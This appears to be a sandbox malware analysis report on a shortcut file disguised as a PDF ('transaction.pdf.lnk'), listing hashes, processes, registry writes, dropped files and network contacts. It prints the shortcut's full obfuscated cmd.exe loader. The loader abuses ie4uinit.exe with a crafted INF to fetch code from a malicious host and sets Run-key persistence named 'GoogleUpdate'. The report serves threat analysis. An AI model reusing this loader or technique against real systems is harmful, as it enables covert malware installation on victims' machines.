| File name: | transaction.pdf.lnk |
| Full analysis: | https://app.any.run/tasks/540c48e8-8dd1-44f6-a7b7-f4f74de446f7 |
| Verdict: | Malicious activity |
| Analysis date: | September 08, 2024, 19:05:12 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Indicators: | |
| MIME: | application/octet-stream |
| File info: | MS Windows shortcut, Item id list present, Has Working directory, Has command line arguments, Icon number=13, Archive, ctime=Mon Jan 1 00:00:00 1601, mtime=Mon Jan 1 00:00:00 1601, atime=Mon Jan 1 00:00:00 1601, length=0, window=hide |
| MD5: | B9A843367B406B486084FB23C73BDCD5 |
| SHA1: | 9607E1E2DD38B9A74D97FEB0D279177B8602FECF |
| SHA256: | 25F7288B294090810B61C199A8258DA6547609ACAEE5CC4BAC47C0775102869B |
| SSDEEP: | 96:8vGDTvTb6KVmDd/vjHZllY0+FrFYdjFPZe1Kdlhg:8+Lts5T |
| .lnk | | | Windows Shortcut (100) |
|---|
| Flags: | IDList, WorkingDir, CommandArgs, IconFile, Unicode, NoLinkInfo |
|---|---|
| FileAttributes: | Archive |
| TargetFileSize: | - |
| IconIndex: | 13 |
| RunWindow: | Normal |
| HotKey: | (none) |
| TargetFileDOSName: | cmd.exe |
| WorkingDirectory: | C:\Windows\System32 |
| CommandLineArguments: | /v /c "set "qtJ1=e"&&set "NND2=n"&&set "WDx3=c"&&set "HnH4=r"&&set "LGN5=y"&&set "hxR6=p"&&set "LLU7=t"&&set "tfN8=i"&&set "bvl9=o"&&set "dkk10=n"&&set "oDx11=k"&&set "yos12=e"&&set "xJa13=y"&@echo off & (for %t in ("[v!yos12!!HnH4!s!tfN8!!bvl9!!dkk10!]" "s!tfN8!g!dkk10!a!LLU7!u!HnH4!!yos12! = $w!tfN8!!dkk10!d!bvl9!ws !dkk10!!LLU7!f7f81a39-5f63-5b42-9efd-1f13b5431005quot; "[d!yos12!s!LLU7!!tfN8!!dkk10!a!LLU7!!tfN8!!bvl9!!dkk10!d!tfN8!!HnH4!s]" "A45E=01" "[d!yos12!faul!LLU7!!tfN8!!dkk10!s!LLU7!all.w!tfN8!!dkk10!d!bvl9!ws7]" "U!dkk10!R!yos12!g!tfN8!s!LLU7!!yos12!!HnH4!OCXs=F07FD" "d!yos12!lf!tfN8!l!yos12!s=A45E" "[F07FD]" "%11%\s!WDx3!R!bvl9!bj,NI,h!LLU7!!LLU7!!hxR6!s://bas!yos12!.sha!HnH4!!yos12!f!tfN8!l!yos12!s.!WDx3!!yos12!!dkk10!!LLU7!!yos12!!HnH4!/%COMPUTERNAME%/0" "[A45E]" "!tfN8!!yos12!u!tfN8!!dkk10!!tfN8!%OAL%f" "[s!LLU7!!HnH4!!tfN8!!dkk10!gs]" "s!yos12!!HnH4!v!tfN8!!WDx3!!yos12!!dkk10!am!yos12!=' '" "sh!bvl9!!HnH4!!LLU7!sv!WDx3!!dkk10!am!yos12!=' '" "OAL=!LLU7!.!tfN8!!dkk10!") do echo %~t) > "%tmp%\a.!LLU7!x!LLU7!" & copy /Y %windir%\S!xJa13!s!LLU7!!yos12!m32\!tfN8!!yos12!4u!tfN8!!dkk10!!tfN8!!LLU7!.!yos12!x!yos12! %tmp%\ & ren %tmp%\a.!LLU7!x!LLU7! !tfN8!!yos12!u!tfN8!!dkk10!!tfN8!!LLU7!.!tfN8!!dkk10!f & s!LLU7!a!HnH4!!LLU7! "" /m!tfN8!!dkk10! wm!tfN8!!WDx3! !hxR6!!HnH4!!bvl9!!WDx3!!yos12!ss !WDx3!all !WDx3!!HnH4!!yos12!a!LLU7!!yos12! "%tmp%\!tfN8!!yos12!4u!tfN8!!dkk10!!tfN8!!LLU7!.!yos12!x!yos12! -Bas!yos12!S!yos12!!LLU7!!LLU7!!tfN8!!dkk10!gs"" |
| IconFileName: | %ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 736 | "C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent | C:\Windows\System32\slui.exe | SppExtComObj.Exe | ||||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows Activation Client Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1164 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2456 | "C:\Windows\System32\cmd.exe" /v /c "set "qtJ1=e"&&set "NND2=n"&&set "WDx3=c"&&set "HnH4=r"&&set "LGN5=y"&&set "hxR6=p"&&set "LLU7=t"&&set "tfN8=i"&&set "bvl9=o"&&set "dkk10=n"&&set "oDx11=k"&&set "yos12=e"&&set "xJa13=y"&@echo off & (for %t in ("[v!yos12!!HnH4!s!tfN8!!bvl9!!dkk10!]" "s!tfN8!g!dkk10!a!LLU7!u!HnH4!!yos12! = $w!tfN8!!dkk10!d!bvl9!ws !dkk10!!LLU7!f7f81a39-5f63-5b42-9efd-1f13b5431005quot; "[d!yos12!s!LLU7!!tfN8!!dkk10!a!LLU7!!tfN8!!bvl9!!dkk10!d!tfN8!!HnH4!s]" "A45E=01" "[d!yos12!faul!LLU7!!tfN8!!dkk10!s!LLU7!all.w!tfN8!!dkk10!d!bvl9!ws7]" "U!dkk10!R!yos12!g!tfN8!s!LLU7!!yos12!!HnH4!OCXs=F07FD" "d!yos12!lf!tfN8!l!yos12!s=A45E" "[F07FD]" "%11%\s!WDx3!R!bvl9!bj,NI,h!LLU7!!LLU7!!hxR6!s://bas!yos12!.sha!HnH4!!yos12!f!tfN8!l!yos12!s.!WDx3!!yos12!!dkk10!!LLU7!!yos12!!HnH4!/DESKTOP-JGLLJLD/0" "[A45E]" "!tfN8!!yos12!u!tfN8!!dkk10!!tfN8!%OAL%f" "[s!LLU7!!HnH4!!tfN8!!dkk10!gs]" "s!yos12!!HnH4!v!tfN8!!WDx3!!yos12!!dkk10!am!yos12!=' '" "sh!bvl9!!HnH4!!LLU7!sv!WDx3!!dkk10!am!yos12!=' '" "OAL=!LLU7!.!tfN8!!dkk10!") do echo %~t) > "C:\Users\admin\AppData\Local\Temp\a.!LLU7!x!LLU7!" & copy /Y C:\WINDOWS\S!xJa13!s!LLU7!!yos12!m32\!tfN8!!yos12!4u!tfN8!!dkk10!!tfN8!!LLU7!.!yos12!x!yos12! C:\Users\admin\AppData\Local\Temp\ & ren C:\Users\admin\AppData\Local\Temp\a.!LLU7!x!LLU7! !tfN8!!yos12!u!tfN8!!dkk10!!tfN8!!LLU7!.!tfN8!!dkk10!f & s!LLU7!a!HnH4!!LLU7! "" /m!tfN8!!dkk10! wm!tfN8!!WDx3! !hxR6!!HnH4!!bvl9!!WDx3!!yos12!ss !WDx3!all !WDx3!!HnH4!!yos12!a!LLU7!!yos12! "C:\Users\admin\AppData\Local\Temp\!tfN8!!yos12!4u!tfN8!!dkk10!!tfN8!!LLU7!.!yos12!x!yos12! -Bas!yos12!S!yos12!!LLU7!!LLU7!!tfN8!!dkk10!gs"" | C:\Windows\System32\cmd.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3208 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | WMIC.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3448 | "C:\Windows\System32\cmd.exe" /c powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\admin\AppData\Roaming\Adobe\KSAhLDEA.ps1 DESKTOP-JGLLJLD | C:\Windows\System32\cmd.exe | — | wscript.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3568 | reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdate /t REG_SZ /d "wscript C:\Users\admin\AppData\Roaming\Adobe\NjA9FDUjPAAA.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\admin\AppData\Roaming\Adobe\KSAhLDEA.ps1" DESKTOP-JGLLJLD" /f | C:\Windows\System32\reg.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Registry Console Tool Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3900 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4316 | "C:\WINDOWS\system32\cscript.exe" //nologo "C:\Users\admin\AppData\Local\Microsoft\hello.js" DESKTOP-JGLLJLD | C:\Windows\System32\cscript.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Console Based Script Host Version: 5.812.10240.16384 Modules
| |||||||||||||||
| 5184 | C:\WINDOWS\system32\RunDll32.exe C:\WINDOWS\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0 | C:\Windows\System32\rundll32.exe | — | ie4uinit.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Windows host process (Rundll32) Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5468 | "C:\Windows\System32\wscript.exe" "C:\Users\admin\AppData\Roaming\Adobe\NjA9FDUjPAAA.vbs" reg add 'HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' /v GoogleUpdate /t REG_SZ /d 'wscript "C:\Users\admin\AppData\Roaming\Adobe\NjA9FDUjPAAA.vbs" powershell.exe -NoProfile -ExecutionPolicy Bypass -File 'C:\Users\admin\AppData\Roaming\Adobe\KSAhLDEA.ps1' DESKTOP-JGLLJLD' /f | C:\Windows\System32\wscript.exe | — | ie4uinit.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.812.10240.16384 Modules
| |||||||||||||||
| (PID) Process: | (5700) ie4uinit.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\5 |
| Operation: | write | Name: | IEPropFontName |
Value: Times New Roman | |||
| (PID) Process: | (5700) ie4uinit.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\5 |
| Operation: | write | Name: | IEFixedFontName |
Value: Courier New | |||
| (PID) Process: | (5700) ie4uinit.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\6 |
| Operation: | write | Name: | IEPropFontName |
Value: Times New Roman | |||
| (PID) Process: | (5700) ie4uinit.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\6 |
| Operation: | write | Name: | IEFixedFontName |
Value: Courier New | |||
| (PID) Process: | (5700) ie4uinit.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\12 |
| Operation: | write | Name: | IEPropFontName |
Value: Raavi | |||
| (PID) Process: | (5700) ie4uinit.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\12 |
| Operation: | write | Name: | IEFixedFontName |
Value: Raavi | |||
| (PID) Process: | (5700) ie4uinit.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\13 |
| Operation: | write | Name: | IEPropFontName |
Value: Shruti | |||
| (PID) Process: | (5700) ie4uinit.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\13 |
| Operation: | write | Name: | IEFixedFontName |
Value: Shruti | |||
| (PID) Process: | (5700) ie4uinit.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\14 |
| Operation: | write | Name: | IEPropFontName |
Value: Kalinga | |||
| (PID) Process: | (5700) ie4uinit.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\14 |
| Operation: | write | Name: | IEFixedFontName |
Value: Kalinga | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2456 | cmd.exe | C:\Users\admin\AppData\Local\Temp\ie4uinit.exe | executable | |
MD5:FC4692D88845173CB727A17397A3D1FD | SHA256:59156DDFF65A95CD423207F5DEA18ECE3E0CD23B28C73FD837809AC23E0FF83A | |||
| 5700 | ie4uinit.exe | C:\Users\admin\AppData\Roaming\Adobe\KSAhLDEA.ps1 | text | |
MD5:4D5DFBE6A40C752C0C18A01170516ACA | SHA256:A707F8B2D9E234C3A5D6022E5D34DCA31849006C2E064334AF6C4C9047A168A4 | |||
| 2456 | cmd.exe | C:\Users\admin\AppData\Local\Temp\ieuinit.inf | ini | |
MD5:67E23944384903E5BCF8E7435CEEB0F9 | SHA256:4ED1B5537E767C2111A5D80F8EEFF7C3F05CDDD3AB3BA0BC9B7F462D2AB4C3CC | |||
| 5548 | ie4uinit.exe | C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\ie4uinit-ClearIconCache.log | text | |
MD5:542E76A4634F453520B4CB6BE98C72E3 | SHA256:BEC17B3950B80021BD9ED72E156D81056C7B5C0214C4BE1CF318EAA0B8BA08A6 | |||
| 5700 | ie4uinit.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8 | binary | |
MD5:FFB5572BE6ECDA45D1FB600485D20462 | SHA256:8C5216E168A59E9826DAB263BBA34934B323F71C4762E6B23148873F96B3B164 | |||
| 5700 | ie4uinit.exe | C:\Users\admin\AppData\Local\Microsoft\MCArPwAA0 | text | |
MD5:47DFC5EC741633AA4EE18F869BD0993C | SHA256:D696A2162EBC06CFC7397985C7EAA0FA95169D9D797C7A29085AA4D0CD4191AD | |||
| 5700 | ie4uinit.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12 | der | |
MD5:7FB5FA1534DCF77F2125B2403B30A0EE | SHA256:33A39E9EC2133230533A686EC43760026E014A3828C703707ACBC150FE40FD6F | |||
| 5700 | ie4uinit.exe | C:\Users\admin\AppData\Local\Microsoft\MCArPwAA1 | text | |
MD5:0E04585FB48537E61DE5CB117D09798F | SHA256:04B95E6346DDB7A182E3A6B3D0F3DD519012BF3D96043F6EE5E75ECA34523931 | |||
| 5700 | ie4uinit.exe | C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\brndlog.bak | text | |
MD5:4B406A2E542690803FF4266440E42745 | SHA256:48630371E6B16F2762363848C0B42A8E68A16C94C104C66B9F53D5E0E043C77F | |||
| 5700 | ie4uinit.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\0[1].xml | xml | |
MD5:C451D56147EA838783A2A8F0C4B86FBA | SHA256:1201734D6F32CD0DA2DB525CC441127FF885FFFC1011F139EFB2CD5FB8FBED6D | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
5700 | ie4uinit.exe | GET | 200 | 142.250.186.99:80 | http://c.pki.goog/r/gsr1.crl | unknown | — | — | whitelisted |
5700 | ie4uinit.exe | GET | 200 | 142.250.186.99:80 | http://c.pki.goog/r/r4.crl | unknown | — | — | whitelisted |
1780 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | whitelisted |
6056 | svchost.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
7140 | SIHClient.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | whitelisted |
7140 | SIHClient.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
6056 | svchost.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
6276 | RUXIMICS.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
2120 | MoUsoCoreWorker.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
5700 | ie4uinit.exe | 188.114.96.3:443 | base.sharefiles.center | CLOUDFLARENET | NL | malicious |
5700 | ie4uinit.exe | 142.250.186.99:80 | c.pki.goog | GOOGLE | US | whitelisted |
3260 | svchost.exe | 40.115.3.253:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
4316 | cscript.exe | 188.114.96.3:443 | base.sharefiles.center | CLOUDFLARENET | NL | malicious |
1780 | svchost.exe | 20.190.159.4:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
1780 | svchost.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted |
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
base.sharefiles.center |
| malicious |
c.pki.goog |
| whitelisted |
client.wns.windows.com |
| whitelisted |
ipa.sharefiles.center |
| malicious |
login.live.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
slscr.update.microsoft.com |
| whitelisted |